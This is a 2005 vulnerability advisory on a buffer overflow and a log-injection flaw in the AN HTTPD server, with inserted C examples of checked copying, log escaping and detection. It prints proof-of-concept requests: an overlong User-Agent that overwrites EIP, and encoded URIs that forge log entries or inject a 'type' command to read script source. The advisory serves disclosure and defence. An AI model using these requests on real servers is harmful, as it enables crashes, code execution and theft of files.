by Tan Chew Keong
Release Date: 7 Apr 2005
Japanese Version
AN HTTPD Server is web server software for the Windows 95/98/Me/NT/2000/XP platforms. It is easy to install and use, and
supports SSI and CGI. It is suitable for anyone who wants to set up a personal homepage on a home PC, and it works even
over dial-up connections.
A buffer overflow vulnerability was found in the cmdIS.DLL plugin supplied with AN HTTPD. It may be exploited to crash
the server or to execute arbitrary code. In addition, AN HTTPD does not filter the received URI before writing it to the
logfile, so arbitrary characters can be injected into the logfile. This may be exploited to corrupt the logfile or to
inject fake entries. In particular, it may be possible to inject commands into the logfile that are then executed by the
cmdIS.DLL plugin.
Tested on AN HTTPD Server Version 1.42n on English Win2K SP4 and WinXP SP2.
This advisory documents two vulnerabilities found in the AN HTTPD server. The first is a buffer overflow that may be
remotely exploited to crash the server or to execute arbitrary code. The second is a logfile arbitrary character
injection vulnerability that may be exploited to corrupt the logfile, to inject fake entries, or to inject commands
that cmdIS.DLL can be made to execute.
1. cmdIS.DLL Buffer Overflow Vulnerability.
AN HTTPD server supports the use of BAT files as CGI scripts. The cmdIS.DLL plugin that comes with AN HTTPD can be used to
parse BAT files that are used as CGI scripts. cmdIS.DLL supports only a small subset of BAT file commands, such as echo,
set, echo., @echo and type. In particular, the set command can be used in a CGI BAT file to display the environment
variables. Internally, cmdIS.DLL calls the GetEnvironmentStrings API to obtain the environment block. The result of
the API call is copied into a fixed-size buffer without a bounds check, so the buffer overflows whenever the total size
of the environment variables exceeds the size of the buffer.
Several environment variables, such as HTTP_USER_AGENT, HTTP_HOST and HTTP_ACCEPT_ENCODING, are controlled directly
by the attacker: they are populated from the User-Agent, Host and Accept-Encoding request headers. An attacker may
therefore send an overly long value in any of those headers to increase the total size of the environment block and
trigger the overflow.
To exploit this vulnerability, there must be a BAT file on the server that uses the set command, and cmdIS.DLL must be
accessible from the document root. The default installation of AN HTTPD includes the script c:\httpd\cgi-bin\test.bat,
which uses this command; cmdIS.DLL is installed as c:\httpd\scripts\cmdIS.DLL, and the document root is c:\httpd. A
sample request that uses cmdIS.DLL to parse test.bat (assuming the default installation) is shown below. This request
triggers the overflow.
GET /scripts/cmdIS.dll/cgi-bin/test.bat HTTP/1.0
user-agent: aaaaaaaaaaaaaaaaaaaaaa [approx 8300 characters] aaaaaaaaaaaaaaaaaaaa...
The following screen capture shows EIP being overwritten. Exploitation is complicated by the fact that certain
characters in the input buffer are translated by the server, which corrupts the shellcode and also limits the return
addresses that can be used. However, an untranslated copy of the shellcode exists elsewhere in memory, and successful
exploitation was achieved on WinXP using a hardcoded return address.
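The unchecked copy described above, as an added C example that is not the plugin's code: it builds the double-NUL-terminated "NAME=value" block that GetEnvironmentStrings returns for one CGI request, shows the vulnerable copy into a fixed buffer beside a hardened copy that measures the block first, and reports whether a request with a given User-Agent length fits. The buffer size (8192 bytes), the fixed CGI variables, the host name "victim" and the other header values are assumptions made for the example; the advisory gives only the approximate trigger length.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed size of the plugin's fixed buffer; the advisory gives only the
 * approximate trigger length (~8300 bytes of User-Agent), not this value. */
#define CMDIS_ENV_BUF 8192

/* Byte length of a "NAME=val\0NAME=val\0\0" block, the layout
 * GetEnvironmentStrings returns, including the final empty string. */
size_t env_block_len(const char *block)
{
    const char *p = block;
    while (*p != '\0')
        p += strlen(p) + 1;            /* skip one entry and its NUL */
    return (size_t)(p - block) + 1;    /* +1 for the terminating NUL */
}

/* Build the CGI environment block one request produces (caller frees it).
 * Only the three HTTP_* variables the advisory names are attacker controlled;
 * the fixed entries are constructed for the example. */
char *build_env_block(const char *user_agent, const char *host,
                      const char *accept_enc, size_t *out_len)
{
    static const char *fixed[] = {
        "GATEWAY_INTERFACE=CGI/1.1", "SERVER_PROTOCOL=HTTP/1.0",
        "REQUEST_METHOD=GET", "SCRIPT_NAME=/scripts/cmdIS.dll",
        "PATH_INFO=/cgi-bin/test.bat", "REMOTE_ADDR=192.168.2.100"
    };
    const char *names[] = { "HTTP_USER_AGENT=", "HTTP_HOST=",
                            "HTTP_ACCEPT_ENCODING=" };
    const char *vals[] = { user_agent, host, accept_enc };
    size_t i, need = 1;
    char *block, *p;

    for (i = 0; i < 6; i++) need += strlen(fixed[i]) + 1;
    for (i = 0; i < 3; i++) need += strlen(names[i]) + strlen(vals[i]) + 1;
    block = p = malloc(need);
    if (!block) return NULL;
    for (i = 0; i < 6; i++) { strcpy(p, fixed[i]); p += strlen(p) + 1; }
    for (i = 0; i < 3; i++) {
        strcpy(p, names[i]); strcat(p, vals[i]); p += strlen(p) + 1;
    }
    *p = '\0';
    *out_len = need;
    return block;
}

/* Vulnerable pattern: the whole block is copied with no check against the
 * destination size, so a block longer than the buffer writes past its end. */
void copy_env_unchecked(char *buf, const char *block)
{
    memcpy(buf, block, env_block_len(block));
}

/* Hardened pattern: measure first and refuse a block that does not fit. */
int copy_env_checked(char *buf, size_t bufsz, const char *block)
{
    size_t n = env_block_len(block);
    if (n > bufsz) return -1;
    memcpy(buf, block, n);
    return 0;
}

/* 1 if a request with a ua_len-byte User-Agent fits the buffer, 0 if the
 * checked copy rejects it (the unchecked copy would overflow here). */
int request_fits(size_t ua_len)
{
    char buf[CMDIS_ENV_BUF];
    char *ua = malloc(ua_len + 1), *block;
    size_t len;
    int fits;
    if (!ua) return -1;
    memset(ua, 'a', ua_len);
    ua[ua_len] = '\0';
    block = build_env_block(ua, "victim", "gzip", &len);
    fits = block != NULL && copy_env_checked(buf, sizeof buf, block) == 0;
    free(block);
    free(ua);
    return fits;
}

int main(void)
{
    printf("20-byte User-Agent fits the buffer:   %d\n", request_fits(20));
    printf("8300-byte User-Agent fits the buffer: %d\n", request_fits(8300));
    return 0;
}
```

The point of measuring the block first is that its size is not under the server's control: every request header the server exports as an HTTP_* variable adds to it, so any fixed-size destination has to be checked against env_block_len() (or sized dynamically) before the copy.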
If test.bat does not exist, the logfile arbitrary character injection vulnerability described next may be used to
inject a set command into the logfile, which can then be executed by parsing the logfile with cmdIS.DLL.
2. Logfile Arbitrary Character Injection.
AN HTTPD does not perform filtering of the received URI before writing it out to the logfile. This makes it possible
to inject arbitrary characters into the logfile. In particular, it does not filter out CR and LF characters in
the URI before logging the request.
This may be exploited to corrupt the logfile or to inject fake entries. It is also possible to inject commands
into the logfile that can be executed by the cmdIS.DLL plugin. The following HTTP request, when submitted to a
vulnerable AN HTTPD server, creates a fictitious log entry.
http://[hostname]/a%20HTTP/1.0"%20200%202048%0d%0a255.255.255.255%20-%20-%20[06/Mar/2005%3a22%3a31%3a11%20+0800]%20"GET%20/hack
The log entries that will be created are shown below. The second line is the fake entry.
192.168.2.100 - - [06/Mar/2005:22:39:30 +0800] "GET /a HTTP/1.0" 200 2048
255.255.255.255 - - [06/Mar/2005:22:31:11 +0800] "GET /hack HTTP/1.0" 404 215
The default installation of AN HTTPD places this logfile (httpd.log) in the document root. This means that we can
use cmdIS.DLL to parse and execute any commands injected into the logfile. The following HTTP request will inject the
type command into the logfile.
http://[hostname]/%0d%0atype%20cgi-bin%5Ctest.bat
This will create the following two lines in httpd.log
192.168.2.100 - - [06/Mar/2005:22:59:25 +0800] "GET /
type cgi-bin/test.bat HTTP/1.1" 404 211
If httpd.log is in the document root and cmdIS.DLL exists, the following HTTP request makes cmdIS.DLL parse httpd.log
and execute the injected type command, which returns the contents of test.bat. This may be exploited to steal the
source code of any script or text file on the server. The buffer overflow vulnerability described earlier may likewise
be triggered by injecting a set command into httpd.log and parsing it with the vulnerable cmdIS.DLL.
http://[hostname]/scripts/cmdIS.dll/httpd.log
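An added C example covering both log injection requests above and the check a practitioner would want to run over httpd.log; it is not AN HTTPD's code. It decodes the two percent-encoded URIs the way the server does, writes each with a Common Log Format writer that takes the URI verbatim (the vulnerable behaviour) and again after escaping control bytes and quotes (the fix), and scans the result for lines that begin with a keyword cmdIS.DLL would execute. The client address, timestamp, status and byte counts are constructed values; the entry layout follows the log lines shown in the advisory.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* The two request URIs from the advisory, exactly as the client sends them. */
const char *TYPE_INJECT_URI = "/%0d%0atype%20cgi-bin%5Ctest.bat";
const char *FAKE_ENTRY_URI =
    "/a%20HTTP/1.0\"%20200%202048%0d%0a255.255.255.255%20-%20-%20"
    "[06/Mar/2005%3a22%3a31%3a11%20+0800]%20\"GET%20/hack";

/* Decode %XX escapes the way the server does before it logs the URI. */
size_t url_decode(const char *src, char *dst, size_t dstsz)
{
    size_t n = 0;
    while (*src && n + 1 < dstsz) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            dst[n++] = (char)strtol(hex, NULL, 16);
            src += 3;
        } else {
            dst[n++] = *src++;
        }
    }
    dst[n] = '\0';
    return n;
}

/* Common Log Format writer. Given the decoded URI verbatim (the vulnerable
 * behaviour) a CR/LF inside it starts a new line and a '"' closes the field. */
int format_entry(char *out, size_t outsz, const char *client, const char *ts,
                 const char *uri, int status, long bytes)
{
    return snprintf(out, outsz, "%s - - [%s] \"GET %s HTTP/1.1\" %d %ld\n",
                    client, ts, uri, status, bytes);
}

/* The fix: control bytes, '"' and '\' become \xHH before the URI is logged,
 * so one request is always exactly one line and the quoting stays intact. */
size_t escape_field(const char *in, char *out, size_t outsz)
{
    size_t n = 0;
    for (; *in && n + 5 <= outsz; in++) {
        unsigned char c = (unsigned char)*in;
        if (c < 0x20 || c == 0x7f || c == '"' || c == '\\')
            n += (size_t)sprintf(out + n, "\\x%02x", (unsigned)c);
        else
            out[n++] = (char)c;
    }
    out[n] = '\0';
    return n;
}

/* Log one request; hardened == 0 passes the URI verbatim, otherwise it is
 * escaped first. Client, timestamp and byte count are constructed values. */
char *log_request(int hardened, const char *enc_uri, int status,
                  char *out, size_t outsz)
{
    char uri[1024], esc[2048];
    url_decode(enc_uri, uri, sizeof uri);
    if (hardened) escape_field(uri, esc, sizeof esc);
    format_entry(out, outsz, "192.168.2.100", "06/Mar/2005:22:59:25 +0800",
                 hardened ? esc : uri, status, 211);
    return out;
}

/* Physical lines in the log text; one request should produce exactly one. */
int count_lines(const char *s)
{
    int n = 0;
    for (; *s; s++) n += (*s == '\n');
    return n;
}

/* Detection: count lines that begin with a command cmdIS.DLL understands.
 * A genuine entry starts with the client address, never with a keyword. */
int count_injected_commands(const char *log)
{
    static const char *cmds[] = { "@echo", "echo", "set", "type" };
    int hits = 0;
    const char *line = log;
    while (*line) {
        const char *eol = strchr(line, '\n');
        size_t len = eol ? (size_t)(eol - line) : strlen(line), cl, i;
        for (i = 0; i < sizeof cmds / sizeof cmds[0]; i++) {
            cl = strlen(cmds[i]);
            if (len >= cl && strncmp(line, cmds[i], cl) == 0 &&
                (len == cl || line[cl] == ' ' || line[cl] == '.' ||
                 line[cl] == '\r')) {
                hits++;
                break;
            }
        }
        if (!eol) break;
        line = eol + 1;
    }
    return hits;
}

int main(void)
{
    char buf[4096];
    printf("%s", log_request(0, TYPE_INJECT_URI, 404, buf, sizeof buf));
    printf("%s", log_request(1, TYPE_INJECT_URI, 404, buf, sizeof buf));
    return 0;
}
```

Run against the verbatim logger, the type request yields two lines with the second starting in "type ", which is exactly what cmdIS.DLL would pick up; the escaped logger yields one line and no keyword. The scanner is the check to run over an existing httpd.log after the fact, since escaping only protects entries written after the fix is in place.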
- The author has acknowledged these vulnerabilities and will fix them in the next release. In the meantime, apply
the following workarounds.
- Delete cmdIS.DLL and all sample scripts.
- Put httpd.log outside the document root.
06 Mar 05 - Vulnerability Discovered.
07 Mar 05 - Initial Author Notification.
12 Mar 05 - Second Author Notification.
20 Mar 05 - Third Author Notification.
05 Apr 05 - Fourth Author Notification.
07 Apr 05 - Author Acknowledged Vulnerabilities.
07 Apr 05 - Public Release
For further questions and enquiries, email the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg